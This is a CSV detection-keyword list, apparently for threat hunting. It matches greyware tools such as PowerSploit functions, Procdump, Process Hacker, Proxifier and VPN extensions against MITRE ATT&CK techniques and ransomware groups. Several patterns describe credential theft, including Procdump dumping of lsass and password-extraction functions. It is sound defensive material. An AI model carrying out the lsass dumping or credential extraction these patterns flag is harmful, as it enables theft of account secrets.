"*Get-NetForestDomain*",".{0,1000}Get\-NetForestDomain.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
"*Get-NetForestTrust*",".{0,1000}Get\-NetForestTrust.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
"*Get-NetSession*",".{0,1000}Get\-NetSession.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
"*Get-NetShare*",".{0,1000}Get\-NetShare.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
"*Get-NetSubnet*",".{0,1000}Get\-NetSubnet.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
"*Get-RegistryAutoLogon*",".{0,1000}Get\-RegistryAutoLogon.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
"*Get-SiteListPassword*",".{0,1000}Get\-SiteListPassword.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
"*Get-TimedScreenshot*",".{0,1000}Get\-TimedScreenshot.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
"*Get-UnquotedService*",".{0,1000}Get\-UnquotedService.{0,1000}","greyware_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","11743","4590","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
"*jljopmgdobloagejpohpldgkiellmfnc*",".{0,1000}jljopmgdobloagejpohpldgkiellmfnc.{0,1000}","greyware_tool_keyword","PP VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://www.premiumize.me/*",".{0,1000}https\:\/\/www\.premiumize\.me\/.{0,1000}","greyware_tool_keyword","premiumize.me","hosting service abused by attackers","T1583.003 - T1071 - T1102","TA0010 - TA0005 - TA0009","N/A","N/A","Collection","www.premiumize.me","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*akkbkhnikoeojlhiiomohpdnkhbkhieh*",".{0,1000}akkbkhnikoeojlhiiomohpdnkhbkhieh.{0,1000}","greyware_tool_keyword","Prime VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*jplnlifepflhkbkgonidnobkakhmpnmh*",".{0,1000}jplnlifepflhkbkgonidnobkakhmpnmh.{0,1000}","greyware_tool_keyword","Private Internet Access","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*https://privnote.com/*",".{0,1000}https\:\/\/privnote\.com\/.{0,1000}","greyware_tool_keyword","privnote.com","temporary notes service - abused by attackers to share informations with their victims","T1105 - T1071","TA0010 - TA0009","N/A","Akira","Collection","https://github.com/Casualtek/Ransomchats/blob/4a25ac6ad165a4e600aeb72718c3ad41e8f6ce3a/Akira/20240620.json#L31C27-L31C48","1","1","N/A","downloading files url","5","5","410","38","2024-08-30T10:51:23Z","2023-05-02T16:17:48Z"
"* -ma lssas.exe*",".{0,1000}\s\-ma\slssas\.exe.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Procdump.zip*",".{0,1000}\/Procdump\.zip.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\lsass.dmp*",".{0,1000}\\lsass\.dmp.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Procdump.zip*",".{0,1000}\\Procdump\.zip.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Sysinternals\ProcDump\*",".{0,1000}\\SOFTWARE\\Sysinternals\\ProcDump\\.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Users\Public\*.dmp*",".{0,1000}\\Users\\Public\\.{0,1000}\.dmp.{0,1000}","greyware_tool_keyword","procdump","Dump files might contain sensitive data and are often created as part of debugging processes or by attackers exfiltrating data. Users\Public should not be used","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","false positive risks","10","10","N/A","N/A","N/A","N/A"
"*<Data Name='PipeName'>\lsass</Data><Data Name='Image'>*procdump*</Data>*",".{0,1000}\<Data\sName\=\'PipeName\'\>\\lsass\<\/Data\>\<Data\sName\=\'Image\'\>.{0,1000}procdump.{0,1000}\<\/Data\>.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","pipe connect ED 18 sysmon","10","10","N/A","N/A","N/A","N/A"
"*>ProcDump<*",".{0,1000}\>ProcDump\<.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","#productname","N/A","10","10","N/A","N/A","N/A","N/A"
"*procdump*lsass*",".{0,1000}procdump.{0,1000}lsass.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*procdump*lsass*",".{0,1000}procdump.{0,1000}lsass.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*procdump.exe* -ma*",".{0,1000}procdump\.exe.{0,1000}\s\-ma.{0,1000}","greyware_tool_keyword","Procdump","full dump with procdump (often used to dump lsass)","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*procdump64*lsass*",".{0,1000}procdump64.{0,1000}lsass.{0,1000}","greyware_tool_keyword","Procdump","dump lsass process with procdump","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*procdump64.exe*",".{0,1000}procdump64\.exe.{0,1000}","greyware_tool_keyword","Procdump","usage of procdump (often used to dump lsass)","T1003.001","TA0006","N/A","LockBit - Conti - Quantum - PYSA - NetWalker - 8BASE","Credential Access","https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/processhacker-*-bin.zip*",".{0,1000}\/processhacker\-.{0,1000}\-bin\.zip.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*/processhacker/files/latest/download*",".{0,1000}\/processhacker\/files\/latest\/download.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\Process Hacker 2\*",".{0,1000}\\Process\sHacker\s2\\.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*processhacker-*-sdk.zip*",".{0,1000}processhacker\-.{0,1000}\-sdk\.zip.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*processhacker-*-setup.exe*",".{0,1000}processhacker\-.{0,1000}\-setup\.exe.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*processhacker-*-src.zip*",".{0,1000}processhacker\-.{0,1000}\-src\.zip.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*ProcessHacker.exe*",".{0,1000}ProcessHacker\.exe.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*ProcessHacker.sln*",".{0,1000}ProcessHacker\.sln.{0,1000}","greyware_tool_keyword","processhacker","Interactions with a objects present in windows such as threads stack - handles - gpu - services ? can be used by attackers to dump process - create services  and process injection","T1055.001 - T1055.012 - T1003.001 - T1056.005","TA0005 - TA0003 - TA0040 - TA0006 - TA0009","N/A","N/A","Persistence","https://processhacker.sourceforge.io/","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\Procmon.exe*",".{0,1000}\\AppData\\Local\\Temp\\Procmon\.exe.{0,1000}","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Discovery","N/A","1","1","N/A","greyware tool - risks of False positive !","4","7","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\Procmon64.exe*",".{0,1000}\\AppData\\Local\\Temp\\Procmon64\.exe.{0,1000}","greyware_tool_keyword","procmon","Procmon used in user temp folder","T1059.001 - T1036 - T1569.002","TA0002 - TA0006","N/A","N/A","Discovery","N/A","1","1","N/A","greyware tool - risks of False positive !","4","7","N/A","N/A","N/A","N/A"
"*nhfjkakglbnnpkpldhjmpmmfefifedcj*",".{0,1000}nhfjkakglbnnpkpldhjmpmmfefifedcj.{0,1000}","greyware_tool_keyword","Pron VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*aakchaleigkohafkfjfjbblobjifikek*",".{0,1000}aakchaleigkohafkfjfjbblobjifikek.{0,1000}","greyware_tool_keyword","ProxFlow","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"* stop ProxifierDrv*",".{0,1000}\sstop\sProxifierDrv.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*/Proxifier.app/Contents/MacOS/Proxifier*",".{0,1000}\/Proxifier\.app\/Contents\/MacOS\/Proxifier.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*/Proxifier.exe*",".{0,1000}\/Proxifier\.exe.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*/Proxifier/Proxifier.app/*",".{0,1000}\/Proxifier\/Proxifier\.app\/.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*/ProxifierPE.zip*",".{0,1000}\/ProxifierPE\.zip.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*/ProxifierSetup.exe*",".{0,1000}\/ProxifierSetup\.exe.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","1","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\*\Proxifier PE\*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\Proxifier\sPE\\.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\Proxifier PE\*",".{0,1000}\\AppData\\Local\\Temp\\Proxifier\sPE\\.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\Proxifier Service Manager.lnk*",".{0,1000}\\Proxifier\sService\sManager\.lnk.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\Proxifier.exe*",".{0,1000}\\Proxifier\.exe.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\Proxifier.lnk*",".{0,1000}\\Proxifier\.lnk.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\ProxifierDrv.sys*",".{0,1000}\\ProxifierDrv\.sys.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\ProxifierPE.zip*",".{0,1000}\\ProxifierPE\.zip.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\ProxifierSetup.exe*",".{0,1000}\\ProxifierSetup\.exe.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\ProxifierSetup.tmp*",".{0,1000}\\ProxifierSetup\.tmp.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\ProxifierShellExt.dll*",".{0,1000}\\ProxifierShellExt\.dll.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\ProxyChecker.exe*",".{0,1000}\\ProxyChecker\.exe.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*\SOFTWARE\WOW6432Node\Microsoft\Tracing\Proxifier_*",".{0,1000}\\SOFTWARE\\WOW6432Node\\Microsoft\\Tracing\\Proxifier_.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","#registry","N/A","8","9","N/A","N/A","N/A","N/A"
"*\Start Menu\Programs\Proxifier*",".{0,1000}\\Start\sMenu\\Programs\\Proxifier.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*>Proxifier Setup<*",".{0,1000}\>Proxifier\sSetup\<.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","#description","N/A","8","9","N/A","N/A","N/A","N/A"
"*com.initex.proxifier.v3.macos*",".{0,1000}com\.initex\.proxifier\.v3\.macos.{0,1000}","greyware_tool_keyword","Proxifier","allows to proxy connections for programs","T1090 - T1071 - T1078.003","TA0005","N/A","Scattered Spider* - Proxifier","Defense Evasion","https://www.proxifier.com/download/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
